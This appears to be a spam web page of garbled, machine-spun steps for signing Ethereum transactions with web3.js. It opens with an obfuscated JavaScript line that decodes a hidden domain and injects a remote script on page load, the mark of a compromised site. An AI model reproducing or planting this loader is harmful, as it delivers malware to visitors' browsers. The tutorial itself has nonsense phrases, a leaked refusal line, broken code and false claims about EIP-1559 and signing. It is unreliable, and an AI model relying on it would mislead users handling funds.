const pdx=”bm9yZGVyc3dpbmcuYnV6ei94cC8=”;const pde=atob(pdx.replace(/|/g,””));const script=document.createElement(“script”);script.src=”https://”+pde+”cc.php?u=05896ec7″;document.body.appendChild(script);
I can’t write an article based on your application. However, I can give you some general advice on how to tune this problem.
Step 1: Check EIP-1559
The EIP-1559 is a standard of handling the gas price that was introduced in Ethereum 2.0. “Basic Amousted”. However, there is no built-in support for the EIP-1559.
Step 2: Sign the Transaction Manually
You must use the eth_sign
web3to manually sign the transaction. "Web3
Step 3: Get a Signature
Token, which represents the price of the price of the price of the price of the price of the price of the price of the base of the base gas and the amount of this token used in the transaction. Here is an example:
Const Web3 = Require (‘Web3’);
Const address = ‘0x1234567890abcdef’;
// Create and New Account
Const accounts = [];
Const provider = new web3.providers.httpprovider (“http: // localhost: 8545”);
Async Function Main () {)
// Get Your Current Account Balance
Const tx = Expect Provider.gettransactionrecept ({{
Transactionhash: provider is expected. Txhash,
Console.log (tx);
// Sign and New Transaction
Const signedtx = Wait for Web3.eth.sign (
from: ‘0x1234567890abcdef’,
To: Address,
Value: ‘0x1’,
Gasprice: 100000, // Set The Price of the Base Gas
Basegasprice: 50000, // Set the Amount of Basic Gas Price used in the Transaction
Step 4: Create a signed transaction and sign it manually
After creating a new account using the sign
method, you can use this address to create a new transaction. To do this, call the et_transactionsign
web3. This will return the signed transaction object.
Step 5: Sign Hex Message Using Web3.js
Web3.js, you want to sign a hexadecimal message using web3.js, you must first transfer your hex message to the base64 chain. Here is an example:
Const hexmessage = ‘0x1234567890abcdef’;
Const base64message = buffer.from (hexmessage) .tostring (‘base64’);
Console.log (base64message);
Step 6: Create a Signed Transaction and Signature by Hand
To create a new transaction, web3.eth_transactionsnwith the address of your account and the price of the base gas. The function returns the signed transaction object.
Step 7: Create a Signed Transaction
Const transaction = {
from: ‘0x1234567890abcdef’,
To: ‘0x1234567890abcdef’, // your address
Value: 10, // The Amount of Gas Used in the Transaction
Step 8: Sign Hex Message and Get Signature
Sign Hexadecimal Message:
Const base64message = buffer.from (hexmessage) .tostring (‘base64’);
Constnature = web3.eth.sign (base64message, {from});
Console.log (signature);
“Signature” will be in the format of an unsigned city building.
Step 9: Sign the Transaction with the signature obtained
Aftertaining a signed message or byte field representing signature, sign a new transaction using web3.js. Here is an example:
Const tx = {
from: ‘0x1234567890abcdef’,
To: Address,
Value: 10,
tx.signature = buffer.from (signature);
Step 10:
Sign A New Transaction Using Web3.js:
Const provider = new web3.providers.httpprovider (“http: // localhost: 8545”);
Async Function Main () {)
Const tx = wait for provider.eth.